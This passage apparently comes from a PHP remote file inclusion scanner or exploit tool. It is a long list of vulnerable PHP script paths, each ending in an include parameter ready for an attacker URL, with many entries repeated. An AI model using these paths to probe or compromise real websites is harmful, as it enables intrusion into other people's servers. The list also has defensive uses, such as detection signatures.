  918.  
  919. 'research/boards/encapsbb-.._fixed/index_header.php?root=',
  920.  
  921. 'Farsi/index.php?archive=',
  922.  
  923. 'index.php?archive=',
  924.  
  925. 'show_archives.php?template=',
  926.  
  927. 'forum/include/common.php?pun_root=',
  928.  
  929. 'pmwiki wiki/pmwiki-..beta/pmwiki.php?GLOBALS[FarmD]=',
  930.  
  931. 'vuln.php?=',
  932.  
  933. 'cgi-bin//include/write.php?dir=',
  934.  
  935. 'admin/common.inc.php?basepath=',
  936.  
  937. 'pm/lib.inc.php?sfx=',
  938.  
  939. 'pm/lib.inc.php?pm_path=',
  940.  
  941. 'artmedic-kleinanzeigen-path/index.php?id=',
  942.  
  943. 'osticket/include/main.php?include_dir=',
  944.  
  945. 'include/main.php?config[search_disp]include_dir=',
  946.  
  947. 'phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=',
  948.  
  949. 'quick_reply.php?phpbb_root_path=',
  950.  
  951. 'zboard/include/write.php?dir=',
  952.  
  953. 'admin/plog-admin-functions.php?configbasedir=',
  954.  
  955. 'content.php?content=',
  956.  
  957. 'q-news.php?id=',
  958.  
  959. '_conf/core/common-tpl-vars.php?confdir=',
  960.  
  961. 'votebox.php?VoteBoxPath=',
  962.  
  963. 'al_initialize.php?alpath=',
  964.  
  965. 'include/db.php?GLOBALS[rootdp]=',
  966.  
  967. 'modules/news/archivednews.php?GLOBALS[language_home]=',
  968.  
  969. 'protection.php?siteurl=',
  970.  
  971. 'modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=',
  972.  
  973. 'index.php?includes_dir=',
  974.  
  975. 'classes.php?LOCAL_PATH=',
  976.  
  977. 'extensions/moblog/moblog_lib.php?basedir=',
  978.  
  979. 'modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=',
  980.  
  981. 'phpWebLog/include/init.inc.php?G_PATH=',
  982.  
  983. 'admin/objects.inc.php?Server=',
  984.  
  985. 'trg_news/trgnews/install/article.php?dir=',
  986.  
  987. 'block.php?Include=',
  988.  
  989. 'arpuivo.php?data=',
  990.  
  991. 'setup/index.php?GALLERY_BASEDIR=',
  992.  
  993. 'include/help.php?base=',
  994.  
  995. 'index.php?[Home]=',
  996.  
  997. 'block.php?Include=',
  998.  
  999. 'examples/phonebook.php?page=',
  1000.  
  1001. 'PHPNews/auth.php?path=',
  1002.  
  1003. 'include/print_category.php?dir=',
  1004.  
  1005. 'skin/zero_vote/login.php?dir=',
  1006.  
  1007. 'skin/zero_vote/setup.php?dir=',
  1008.  
  1009. 'skin/zero_vote/ask_password.php?dir=',
  1010.  
  1011. 'gui/include/sql.php?include_path=',
  1012.  
  1013. 'webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=',
  1014.  
  1015. 'email.php?logincer_skin=',
  1016.  
  1017. 'PhotoGal/ops/gals.php?news_file=',
  1018.  
  1019. 'index.php?custom=',
  1020.  
  1021. 'loginout.php?cutepath=',
  1022.  
  1023. 'oneadmin/config.php?path[docroot]=',
  1024.  
  1025. 'xcomic/initialize.php?xcomicRootPath=',
  1026.  
  1027. 'skin/zero_vote/setup.php?dir=',
  1028.  
  1029. 'skin/zero_vote/error.php? dir=',
  1030.  
  1031. 'admin_modules/admin_module_captions.inc.php?config[path_src_include]=',
  1032.  
  1033. 'admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=',
  1034.  
  1035. 'admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=',
  1036.  
  1037. 'admin_modules/admin_module_edit.inc.php?config[path_src_include]=',
  1038.  
  1039. 'admin_modules/admin_module_delimage.inc.php?config[path_src_include]=',
  1040.  
  1041. 'admin_modules/admin_module_deldir.inc.php?config[path_src_include]=',
  1042.  
  1043. 'src/index_overview.inc.php?config[path_src_include]=',
  1044.  
  1045. 'src/index_leftnavbar.inc.php?config[path_src_include]=',
  1046.  
  1047. 'src/index_image.inc.php?config[path_src_include]=',
  1048.  
  1049. 'src/image-gd.class.php?config[path_src_include]=',
  1050.  
  1051. 'src/image.class.php?config[path_src_include]=',
  1052.  
  1053. 'src/album.class.php?config[path_src_include]=',
  1054.  
  1055. 'src/show_random.inc.php?config[path_src_include]=',
  1056.  
  1057. 'src/main.inc.php?config[path_src_include]=',
  1058.  
  1059. 'src/index_passwd-admin.inc.php?config[path_admin_include]=',
  1060.  
  1061. 'yappa-ng/src/index_overview.inc.php?config[path_src_include]=',
  1062.  
  1063. 'admin_modules/admin_module_captions.inc.php?config[path_src_include]=',
  1064.  
  1065. 'admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=',
  1066.  
  1067. 'admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=',
  1068.  
  1069. 'admin_modules/admin_module_edit.inc.php?config[path_src_include]=',
  1070.  
  1071. 'admin_modules/admin_module_delimage.inc.php?config[path_src_include]=',
  1072.  
  1073. 'admin_modules/admin_module_deldir.inc.php?config[path_src_include]=',
  1074.  
  1075. 'src/index_overview.inc.php?config[path_src_include]=',
  1076.  
  1077. 'src/image-gd.class.php?config[path_src_include]=',
  1078.  
  1079. 'src/image.class.php?config[image_module]=',
  1080.  
  1081. 'src/album.class.php?config[path_src_include]=',
  1082.  
  1083. 'src/show_random.inc.php?config[path_src_include]=',
  1084.  
  1085. 'src/main.inc.php?config[path_src_include]=',
  1086.  
  1087. 'includes/db_adodb.php?baseDir=',
  1088.  
  1089. 'includes/db_connect.php?baseDir=',
  1090.  
  1091. 'includes/session.php?baseDir=',
  1092.  
  1093. 'modules/projects/gantt.php?dPconfig[root_dir]=',
  1094.  
  1095. 'modules/projects/gantt.php?dPconfig[root_dir]=',
  1096.  
  1097. 'modules/projects/vw_files.php?dPconfig[root_dir]=',
  1098.  
  1099. 'modules/admin/vw_usr_roles.php?baseDir=',
  1100.  
  1101. 'modules/public/calendar.php?baseDir=',
  1102.  
  1103. 'modules/public/date_format.php?baseDir=',
  1104.  
  1105. 'modules/tasks/gantt.php?baseDir=',
  1106.  
  1107. 'mantis/login_page.php?g_meta_include_file=',
  1108.  
  1109. 'phpgedview/help_text_vars.php?PGV_BASE_DIRECTORY=',
  1110.  
  1111. 'modules/My_eGallery/public/displayCategory.php?basepath=',
  1112.  
  1113. 'dotproject/modules/files/index_table.php?root_dir=',
  1114.  
  1115. 'nukebrowser.php?filnavn=',
  1116.  
  1117. 'bug_sponsorship_list_view_inc.php?t_core_path=',
  1118.  
  1119. 'modules/coppermine/themes/coppercop/theme.php?THEME_DIR=',
  1120.  
  1121. 'modules/coppermine/themes/maze/theme.php?THEME_DIR=',
  1122.  
  1123. 'modules/coppermine/include/init.inc.php?CPG_M_DIR=',
  1124.  
  1125. 'includes/calendar.php?phpc_root_path=',
  1126.  
  1127. 'includes/setup.php?phpc_root_path=',
  1128.  
  1129. 'phpBB/admin/admin_styles.php?mode=',
  1130.  
  1131. 'aMember/plugins/db/mysql/mysql.inc.php?config=',
  1132.  
  1133. 'admin/lang.php?CMS_ADMIN_PAGE=',
  1134.  
  1135. 'inc/pipe.php?HCL_path=',
  1136.  
  1137. 'include/write.php?dir=',
  1138.  
  1139. 'becommunity/community/index.php?pageurl=',
  1140.  
  1141. 'modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=',
  1142.  
  1143. 'modules/mod_mainmenu.php?mosConfig_absolute_path=',
  1144.  
  1145. 'modules/agendax/addevent.inc.php?agendax_path=',
  1146.  
  1147. 'shoutbox/expanded.php?conf=',
  1148.  
  1149. 'modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=',
  1150.  
  1151. 'index.php?page=',
  1152.  
  1153. 'index.php?pag=',
  1154.  
  1155. 'index.php?include=',
  1156.  
  1157. 'index.php?content=',
  1158.  
  1159. 'index.php?cont=',
  1160.  
  1161. 'index.php?c=',
  1162.  
  1163. 'modules/My_eGallery/index.php?basepath=',
  1164.  
  1165. 'modules/newbb_plus/class/forumpollrenderer.php?bbPath=',
  1166.  
  1167. 'journal.php?m=',
  1168.  
  1169. 'index.php?m=',
  1170.  
  1171. 'links.php?c=',
  1172.  
  1173. 'forums.php?m=',
  1174.  
  1175. 'list.php?c=',
  1176.  
  1177. 'user.php?xoops_redirect=',
  1178.  
  1179. 'index.php?id=',
  1180.  
  1181. 'r.php?url=',
  1182.  
  1183. 'CubeCart/includes/orderSuccess.inc.php?&glob[rootDir]=',
  1184.  
  1185. 'inc/formmail.inc.php?script_root=',
  1186.  
  1187. 'include/init.inc.php?G_PATH=',
  1188.  
  1189. 'backend/addons/links/index.php?PATH=',
  1190.  
  1191. 'modules/newbb_plus/class/class.forumposts.php?bbPath[path]=',
  1192.  
  1193. 'modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=',
  1194.  
  1195. 'protection.php?siteurl=',
  1196.  
  1197. 'htmltonuke.php?filnavn=',
  1198.  
  1199. 'mail_autocheck.php?pm_path=',
  1200.  
  1201. 'index.php?p=',
  1202.  
  1203. 'modules/nAlbum/public/displayCategory.php?basepath=',
  1204.  
  1205. 'e/e_handlers/secure_img_render.php?p=',
  1206.  
  1207. 'include/new-visitor.inc.php?lvc_include_dir=',
  1208.  
  1209. 'community/modules/agendax/addevent.inc.php?agendax_path=',
  1210.  
  1211. 'library/editor/editor.php?root=',
  1212.  
  1213. 'library/lib.php?root=',
  1214.  
  1215. 'zentrack/index.php?configFile=',
  1216.  
  1217. 'pivot/modules/module_db.php?pivot_path=',
  1218.  
  1219. 'myPHPCalendar/admin.php?cal_dir=',
  1220.  
  1221. 'index.php/main.php?x=',
  1222.  
  1223. 'os/pointer.php?url=',
  1224.  
  1225. 'p_uppc_francais/pages_php/p_aidcon_conseils/index.php?FM=',
  1226.  
  1227. 'db.php?path_local=',
  1228.  
  1229. 'phpGedView/individual.php?PGV_BASE_DIRECTORY=',
  1230.  
  1231. 'index.php?kietu[url_hit]=',
  1232.  
  1233. 'phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=',
  1234.  
  1235. 'Sources/Packages.php?sourcedir=',
  1236.  
  1237. 'modules/PNphpBB/includes/functions_admin.php?phpbb_root_path=',
  1238.  
  1239. 'cgi-bin//gadgets/Blog/BlogModel.php?path=',
  1240.  
  1241. 'modules/my_egallery/?root_path=',
  1242.  
  1243. 'adminpanel/includes/add_forms/addbioform.php?root_path=',
  1244.  
  1245. 'adminpanel/includes/add_forms/addfliersform.php?root_path=',
  1246.  
  1247. 'adminpanel/includes/add_forms/addgenmerchform.php?root_path=',
  1248.  
  1249. 'adminpanel/includes/add_forms/addinterviewsform.php?root_path=',
  1250.  
  1251. 'adminpanel/includes/add_forms/addlinksform.php?root_path=',
  1252.  
  1253. 'adminpanel/includes/add_forms/addlyricsform.php?root_path=',
  1254.  
  1255. 'adminpanel/includes/add_forms/addmembioform.php?root_path=',
  1256.  
  1257. 'adminpanel/includes/add_forms/addmerchform.php?root_path=',
  1258.  
  1259. 'adminpanel/includes/add_forms/addmerchpicform.php?root_path=',
  1260.  
  1261. 'adminpanel/includes/add_forms/addnewsform.php?root_path=',
  1262.  
  1263. 'adminpanel/includes/add_forms/addphotosform.php?root_path=',
  1264.  
  1265. 'adminpanel/includes/add_forms/addreleaseform.php?root_path=',
  1266.  
  1267. 'adminpanel/includes/add_forms/addreleasepicform.php?root_path=',
  1268.  
  1269. 'adminpanel/includes/add_forms/addrelmerchform.php?root_path=',
  1270.  
  1271. 'adminpanel/includes/add_forms/addshowsform.php?root_path=',
  1272.  
  1273. 'adminpanel/includes/add_forms/addreviewsform.php?root_path=',
  1274.  
  1275. 'adminpanel/includes/add_forms/addwearmerchform.php?root_path=',
  1276.  
  1277. 'adminpanel/includes/mailinglist/disphtmltbl.php?root_path=',
  1278.  
  1279. 'adminpanel/includes/mailinglist/dispxls.php?root_path=',
  1280.  
  1281. 'preload.php?configowned&func_prog=',
  1282.  
  1283. 'index.php?configowned&func_prog=',
  1284.  
  1285. 'missing.php?header_prog=',
  1286.  
  1287. '_inc/footer.php?theme_root=',
  1288.  
  1289. '_inc/header.php?theme_root=',
  1290.  
  1291. '_inc/pfooter.php?theme_root=',
  1292.  
  1293. '_inc/pheader.php?theme_root=',
  1294.  
  1295. '_inc/web_statsConfig.php?mod_dir=',
  1296.  
  1297. '_inc/web_statsConfig.php?php_ext=',
  1298.  
  1299. '_mods/email.php?header_prog=',
  1300.  
  1301. '_mods/files.php?header_prog=',
  1302.  
  1303. '_mods/headlines.php?header_prog=',
  1304.  
  1305. '_mods/search.php?header_prog=',
  1306.  
  1307. '_mods/topics.php?header_prog=',
  1308.  
  1309. 'admanagerpro/common.php?ipath=',
  1310.  
  1311. 'templates/deluxe/postreply.php?templatefolder=',
  1312.  
  1313. 'templates/deluxe/posting.php?templatefolder=',
  1314.  
  1315. 'templates/deluxe/pm/newpm.php?templatefolder=',
  1316.  
  1317. 'templates/default/postreply.php?templatefolder=',
  1318.  
  1319. 'templates/default/posting.php?templatefolder=',
  1320.  
  1321. 'templates/default/pm/newpm.php?templatefolder=',
  1322.  
  1323. 'modules/Forums/admin/index.php?phpbb_root_path=',
  1324.  
  1325. 'modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=',
  1326.  
  1327. 'modules/Forums/admin/admin_board.php?phpbb_root_path=',
  1328.  
  1329. 'modules/Forums/admin/admin_disallow.php?phpbb_root_path=',
  1330.  
  1331. 'modules/Forums/admin/admin_forumauth.php?phpbb_root_path=',
  1332.  
  1333. 'modules/Forums/admin/admin_groups.php?phpbb_root_path=',
  1334.  
  1335. 'modules/Forums/admin/admin_ranks.php?phpbb_root_path=',
  1336.  
  1337. 'modules/Forums/admin/admin_styles.php?phpbb_root_path=',
  1338.  
  1339. 'modules/Forums/admin/admin_user_ban.php?phpbb_root_path=',
  1340.  
  1341. 'modules/Forums/admin/admin_words.php?phpbb_root_path=',
  1342.  
  1343. 'modules/Forums/admin/admin_avatar.php?phpbb_root_path=',
  1344.  
  1345. 'modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=',
  1346.  
  1347. 'modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=',
  1348.  
  1349. 'modules/Forums/admin/admin_forums.php?phpbb_root_path=',
  1350.  
  1351. 'modules/Forums/admin/admin_mass_email.php?phpbb_root_path=',
  1352.  
  1353. 'modules/Forums/admin/admin_smilies.php?phpbb_root_path=',
  1354.  
  1355. 'modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=',
  1356.  
  1357. 'modules/Forums/admin/admin_users.php?phpbb_root_path=',
  1358.  
  1359. 'faq.php?foing_root_path=',
  1360.  
  1361. 'index.php?foing_root_path=',
  1362.  
  1363. 'list.php?foing_root_path=',
  1364.  
  1365. 'login.php?foing_root_path=',
  1366.  
  1367. 'playlist.php?foing_root_path=',
  1368.  
  1369. 'song.php?foing_root_path=',
  1370.  
  1371. 'gen_mu.php?foing_root_path=',
  1372.  
  1373. 'view_artist.php?foing_root_path=',
  1374.  
  1375. 'view_song.php?foing_root_path=',
  1376.  
  1377. 'login.php?foing_root_path=',
  1378.  
  1379. 'playlist.php?foing_root_path=',
  1380.  
  1381. 'song.php?foing_root_path=',
  1382.  
  1383. 'flash/set_na.php?foing_root_path=',
  1384.  
  1385. 'flash/initialise.php?foing_root_path=',
  1386.  
  1387. 'flash/get_song.php?foing_root_path=',
  1388.  
  1389. 'includes/common.php?foing_root_path=',
  1390.  
  1391. 'admin/nav.php?foing_root_path=',
  1392.  
  1393. 'admin/main.php?foing_root_path=',
  1394.  
  1395. 'admin/list_artists.php?foing_root_path=',
  1396.  
  1397. 'admin/index.php?foing_root_path=',
  1398.  
  1399. 'admin/genres.php?foing_root_path=',
  1400.  
  1401. 'admin/edit_artist.php?foing_root_path=',
  1402.  
  1403. 'admin/edit_album.php?foing_root_path=',
  1404.  
  1405. 'admin/config.php?foing_root_path=',
  1406.  
  1407. 'admin/admin_status.php?foing_root_path=',
  1408.  
  1409. 'includes/header.php?systempath=',
  1410.  
  1411. 'Gallery/displayCategory.php?basepath=',
  1412.  
  1413. 'index.inc.php?PATH_Includes=',
  1414.  
  1415. 'nphp/nphpd.php?nphp_config[LangFile]=',
  1416.  
  1417. 'include/db.php?GLOBALS[rootdp]=',
  1418.  
  1419. 'ashnews.php?pathtoashnews=',
  1420.  
  1421. 'ashheadlines.php?pathtoashnews=',
  1422.  
  1423. 'modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=',
  1424.  
  1425. 'demo/includes/init.php?user_inc=',
  1426.  
  1427. 'jaf/index.php?show=',
  1428.  
  1429. 'inc/shows.inc.php?cutepath=',
  1430.  
  1431. 'poll/admin/common.inc.php?base_path=',
  1432.  
  1433. 'pollvote/pollvote.php?pollname=',
  1434.  
  1435. 'sources/post.php?fil_config=',
  1436.  
  1437. 'modules/My_eGallery/public/displayCategory.php?basepath=',
  1438.  
  1439. 'bb_lib/checkdb.inc.php?libpach=',
  1440.  
  1441. 'include/livre_include.php?no_connect=lol&chem_absolu=',
  1442.  
  1443. 'index.php?from_market=Y&pageurl=',
  1444.  
  1445. 'modules/mod_mainmenu.php?mosConfig_absolute_path=',
  1446.  
  1447. 'pivot/modules/module_db.php?pivot_path=',
  1448.  
  1449. 'modules/4nAlbum/public/displayCategory.php?basepath=',
  1450.  
  1451. 'derniers_commentaires.php?rep=',
  1452.  
  1453. 'modules/coppermine/themes/default/theme.php?THEME_DIR=',
  1454.  
  1455. 'modules/coppermine/include/init.inc.php?CPG_M_DIR=',
  1456.  
  1457. 'modules/coppermine/themes/coppercop/theme.php?THEME_DIR=',
  1458.  
  1459. 'coppermine/themes/maze/theme.php?THEME_DIR=',
  1460.  
  1461. 'allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=',
  1462.  
  1463. 'allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=',
  1464.  
  1465. 'myPHPCalendar/admin.php?cal_dir=',
  1466.  
  1467. 'agendax/addevent.inc.php?agendax_path=',
  1468.  
  1469. 'modules/mod_mainmenu.php?mosConfig_absolute_path=',
  1470.  
  1471. 'modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=',
  1472.  
  1473. 'main.php?page=',
  1474.  
  1475. 'default.php?page=',
  1476.  
  1477. 'index.php?action=',
  1478.  
  1479. 'index1.php?p=',
  1480.  
  1481. 'index2.php?x=',
  1482.  
  1483. 'index2.php?content=',
  1484.  
  1485. 'index.php?conteudo=',
  1486.  
  1487. 'index.php?cat=',
  1488.  
  1489. 'include/new-visitor.inc.php?lvc_include_dir=',
  1490.  
  1491. 'modules/agendax/addevent.inc.php?agendax_path=',
  1492.  
  1493. 'shoutbox/expanded.php?conf=',
  1494.  
  1495. 'modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=',
  1496.  
  1497. 'pivot/modules/module_db.php?pivot_path=',
  1498.  
  1499. 'library/editor/editor.php?root=',
  1500.  
  1501. 'library/lib.php?root=',
  1502.  
  1503. 'e107/e107_handlers/secure_img_render.php?p=',
  1504.  
  1505. 'zentrack/index.php?configFile=',
  1506.  
  1507. 'main.php?x=',
  1508.  
  1509. 'becommunity/community/index.php?pageurl=',
  1510.  
  1511. 'GradeMap/index.php?page=',
  1512.  
  1513. 'mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=',
  1514.  
  1515. 'zentrack/index.php?configFile=',
  1516.  
  1517. 'pivot/modules/module_db.php?pivot_path=',
  1518.  
  1519. 'inc/header.php/step_one.php?server_inc=',
  1520.  
  1521. 'inc/pipe.php?HCL_path=',
  1522.  
  1523. 'include/write.php?dir=',
  1524.  
  1525. 'include/new-visitor.inc.php?lvc_include_dir=',
  1526.  
  1527. 'includes/header.php?systempath=',
  1528.  
  1529. 'support/mailling/maillist/inc/initdb.php?absolute_path=',
  1530.  
  1531. 'coppercop/theme.php?THEME_DIR=',
  1532.  
  1533. 'zentrack/index.php?configFile=',
  1534.  
  1535. 'pivot/modules/module_db.php?pivot_path=',
  1536.  
  1537. 'inc/header.php/step_one.php?server_inc=',
  1538.  
  1539. 'inc/pipe.php?HCL_path=',
  1540.  
  1541. 'include/write.php?dir=',
  1542.  
  1543. 'include/new-visitor.inc.php?lvc_include_dir=',
  1544.  
  1545. 'includes/header.php?systempath=',
  1546.  
  1547. 'support/mailling/maillist/inc/initdb.php?absolute_path=',
  1548.  
  1549. 'coppercop/theme.php?THEME_DIR=',
  1550.  
  1551. 'becommunity/community/index.php?pageurl=',
  1552.  
  1553. 'shoutbox/expanded.php?conf=',
  1554.  
  1555. 'agendax/addevent.inc.php?agendax_path=',
  1556.  
  1557. 'myPHPCalendar/admin.php?cal_dir=',
  1558.  
  1559. 'yabbse/Sources/Packages.php?sourcedir=',
  1560.  
  1561. 'path_of_cpcommerce/_functions.php?prefix=',
  1562.  
  1563. 'dotproject/modules/projects/addedit.php?root_dir=',
  1564.  
  1565. 'dotproject/modules/projects/view.php?root_dir=',
  1566.  
  1567. 'dotproject/modules/projects/vw_files.php?root_dir=',
  1568.  
  1569. 'dotproject/modules/tasks/addedit.php?root_dir=',
  1570.  
  1571. 'dotproject/modules/tasks/viewgantt.php?root_dir=',
  1572.  
  1573. 'My_eGallery/public/displayCategory.php?basepath=',
  1574.  
  1575. 'modules/My_eGallery/public/displayCategory.php?basepath=',
  1576.  
  1577. 'modules/4nAlbum/public/displayCategory.php?basepath=',
  1578.  
  1579. 'modules/coppermine/themes/default/theme.php?THEME_DIR=',
  1580.  
  1581. 'modules/agendax/addevent.inc.php?agendax_path=',
  1582.  
  1583. 'modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=',
  1584.  
  1585. 'modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=',
  1586.  
  1587. 'modules/coppermine/include/init.inc.php?CPG_M_DIR=',
  1588.  
  1589. 'modules/mod_mainmenu.php?mosConfig_absolute_path=',
  1590.  
  1591. 'shoutbox/expanded.php?conf=',
  1592.  
  1593. 'pivot/modules/module_db.php?pivot_path=',
  1594.  
  1595. 'library/editor/editor.php?root=',
  1596.  
  1597. 'library/lib.php?root=',
  1598.  
  1599. 'e107/e107_handlers/secure_img_render.php?p=',
  1600.  
  1601. 'main.php?x=',
  1602.  
  1603. 'main.php?page=',
  1604.  
  1605. 'default.php?page=',
  1606.  
  1607. 'index.php?meio.php=',
  1608.  
  1609. 'index.php?include= ',
  1610.  
  1611. 'index.php?inc= ',
  1612.  
  1613. 'index.php?page= ',
  1614.  
  1615. 'index.php?pag= ',
  1616.  
  1617. 'index.php?p=',
  1618.  
  1619. 'index.php?x=',
  1620.  
  1621. 'index.php?open= ',
  1622.  
  1623. 'index.php?open=',
  1624.  
  1625. 'index.php?visualizar=',
  1626.  
  1627. 'index.php?pagina=',
  1628.  
  1629. 'index.php?content=',
  1630.  
  1631. 'index.php?cont=',
  1632.  
  1633. 'index.php?c=',
  1634.  
  1635. 'index.php?meio=',
  1636.  
  1637. 'index.php?x=',
  1638.  
  1639. 'index.php?cat=',
  1640.  
  1641. 'index.php?site=',
  1642.  
  1643. 'index.php?configFile=',
  1644.  
  1645. 'index.php?action=',
  1646.  
  1647. 'index.php?do=',
  1648.  
  1649. 'index2.php?x=',
  1650.  
  1651. 'index2.php?content=',
  1652.  
  1653. 'template.php?pagina=',
  1654.  
  1655. 'inc/step_one_tables.php?server_inc=',
  1656.  
  1657. 'GradeMap/index.php?page=',
  1658.  
  1659. 'phpshop/index.php?base_dir=',
  1660.  
  1661. 'admin.php?cal_dir=',
  1662.  
  1663. 'path_of_cpcommerce/_functions.php?prefix=',
  1664.  
  1665. 'contacts.php?cal_dir=',
  1666.  
  1667. 'convert-date.php?cal_dir=',
  1668.  
  1669. 'album_portal.php?phpbb_root_path=',
  1670.  
  1671. 'mainfile.php?MAIN_PATH=',
  1672.  
  1673. 'dotproject/modules/files/index_table.php?root_dir=',
  1674.  
  1675. 'html/affich.php?base=',
  1676.  
  1677. 'gallery/init.php?HTTP_POST_VARS=',
  1678.  
  1679. 'pm/lib.inc.php?pm_path=',
  1680.  
  1681. 'ideabox/include.php?gorumDir=',
  1682.  
  1683. 'index2.php?includes_dir=',
  1684.  
  1685. 'forums/toplist.php?phpbb_root_path=',
  1686.  
  1687. 'forum/toplist.php?phpbb_root_path=',
  1688.  
  1689. 'admin/config_settings.tpl.php?include_path=',
  1690.  
  1691. 'include/common.php?include_path=',
  1692.  
  1693. 'event/index.php?page=',
  1694.  
  1695. 'forum/index.php?includeFooter=',
  1696.  
  1697. 'forums/index.php?includeFooter=',
  1698.  
  1699. 'forum/bb_admin.php?includeFooter=',
  1700.  
  1701. 'forums/bb_admin.php?includeFooter=',
  1702.  
  1703. 'language/lang_english/lang_activity.php?phpbb_root_path=',
  1704.  
  1705. 'forum/language/lang_english/lang_activity.php?phpbb_root_path=',
  1706.  
  1707. 'blend_data/blend_common.php?phpbb_root_path=',
  1708.  
  1709. 'master.php?root_path=',
  1710.  
  1711. 'includes/kb_constants.php?module_root_path=',
  1712.  
  1713. 'forum/includes/kb_constants.php?module_root_path=',
  1714.  
  1715. 'forums/includes/kb_constants.php?module_root_path=',
  1716.  
  1717. 'classes/adodbt/sql.php?classes_dir=',
  1718.  
  1719. 'agenda.php3?rootagenda=',
  1720.  
  1721. 'agenda2.php3?rootagenda=',
  1722.  
  1723. 'sources/lostpw.php?CONFIG[path]=',
  1724.  
  1725. 'topsites/sources/lostpw.php?CONFIG[path]=',
  1726.  
  1727. 'toplist/sources/lostpw.php?CONFIG[path]=',
  1728.  
  1729. 'sources/join.php?CONFIG[path]=',
  1730.  
  1731. 'topsites/sources/join.php?CONFIG[path]=',
  1732.  
  1733. 'toplist/sources/join.php?CONFIG[path]=',
  1734.  
  1735. 'topsite/sources/join.php?CONFIG[path]=',
  1736.  
  1737. 'public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=',
  1738.  
  1739. 'extras/poll/poll.php?file_newsportal=',
  1740.  
  1741. 'index.php?site_path=',
  1742.  
  1743. 'mail/index.php?site_path=',
  1744.  
  1745. 'fclick/show.php?path=',
  1746.  
  1747. 'show.php?path=',
  1748.  
  1749. 'calogic/reconfig.php?GLOBALS[CLPath]=',
  1750.  
  1751. 'eshow.php?Config_rootdir=',
  1752.  
  1753. 'auction/auction_common.php?phpbb_root_path=',
  1754.  
  1755. 'index.php?inc_dir=',
  1756.  
  1757. 'calendar/index.php?inc_dir=',
  1758.  
  1759. 'modules/TotalCalendar/index.php?inc_dir=',
  1760.  
  1761. 'modules/calendar/index.php?inc_dir=',
  1762.  
  1763. 'calendar/embed/day.php?path=',
  1764.  
  1765. 'ACalendar/embed/day.php?path=',
  1766.  
  1767. 'calendar/add_event.php?inc_dir=',
  1768.  
  1769. 'claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=',
  1770.  
  1771. 'claroline/auth/ldap/authldap.php?includePath=',
  1772.  
  1773. 'docebo/modules/credits/help.php?lang=',
  1774.  
  1775. 'modules/credits/help.php?lang=',
  1776.  
  1777. 'config.php?returnpath=',
  1778.  
  1779. 'editsite.php?returnpath=',
  1780.  
  1781. 'in.php?returnpath=',
  1782.  
  1783. 'addsite.php?returnpath=',
  1784.  
  1785. 'includes/pafiledb_constants.php?module_root_path=',
  1786.  
  1787. 'phpBB/includes/pafiledb_constants.php?module_root_path=',
  1788.  
  1789. 'pafiledb/includes/pafiledb_constants.php?module_root_path=',
  1790.  
  1791. 'auth/auth.php?phpbb_root_path=',
  1792.  
  1793. 'auth/auth_phpbb/phpbb_root_path=',
  1794.  
  1795. 'apc-aa/cron.php3?GLOBALS[AA_INC_PATH]=',
  1796.  
  1797. 'apc-aa/cached.php3?GLOBALS[AA_INC_PATH]=',
  1798.  
  1799. 'infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=',
  1800.  
  1801. 'phpdig/includes/config.php?relative_script_path=',
  1802.  
  1803. 'includes/phpdig/includes/config.php?relative_script_path=',
  1804.  
  1805. 'includes/dbal.php?eqdkp_root_path=',
  1806.  
  1807. 'eqdkp/includes/dbal.php?eqdkp_root_path=',
  1808.  
  1809. 'dkp/includes/dbal.php?eqdkp_root_path=',
  1810.  
  1811. 'path/include/SQuery/gameSpy2.php?libpath=',
  1812.  
  1813. 'include/global.php?GLOBALS[includeBit]=',
  1814.  
  1815. 'topsites/config.php?returnpath=',
  1816.  
  1817. 'manager/frontinc/prepend.php?_PX_config[manager_path]=',
  1818.  
  1819. 'ubbthreads/addpost_newpoll.php?addpoll=thispath=',
  1820.  
  1821. 'forum/addpost_newpoll.php?thispath=',
  1822.  
  1823. 'forums/addpost_newpoll.php?thispath=',
  1824.  
  1825. 'ubbthreads/ubbt.inc.php?thispath=',
  1826.  
  1827. 'forums/ubbt.inc.php?thispath=',
  1828.  
  1829. 'forum/ubbt.inc.php?thispath=',
  1830.  
  1831. 'forum/admin/addentry.php?phpbb_root_path=',
  1832.  
  1833. 'admin/addentry.php?phpbb_root_path=',
  1834.  
  1835. 'index.php?f=',
  1836.  
  1837. 'index.php?act=',
  1838.  
  1839. 'ipchat.php?root_path=',
  1840.  
  1841. 'includes/orderSuccess.inc.php?glob[rootDir]=',
  1842.  
  1843. 'stats.php?dir[func]=dir[base]=',
  1844.  
  1845. 'ladder/stats.php?dir[base]=',
  1846.  
  1847. 'ladders/stats.php?dir[base]=',
  1848.  
  1849. 'sphider/admin/configset.php?settings_dir=',
  1850.  
  1851. 'admin/configset.php?settings_dir=',
  1852.  
  1853. 'vwar/admin/admin.php?vwar_root=',
  1854.  
  1855. 'modules/vwar/admin/admin.php?vwar_root=',
  1856.  
  1857. 'modules/vWar_Account/includes/get_header.php?vwar_root=',
  1858.  
  1859. 'modules/vWar_Account/includes/functions_common.php?vwar_root2=',
  1860.  
  1861. 'sphider/admin/configset.php?settings_dir=',
  1862.  
  1863. 'admin/configset.php?settings_dir=',
  1864.  
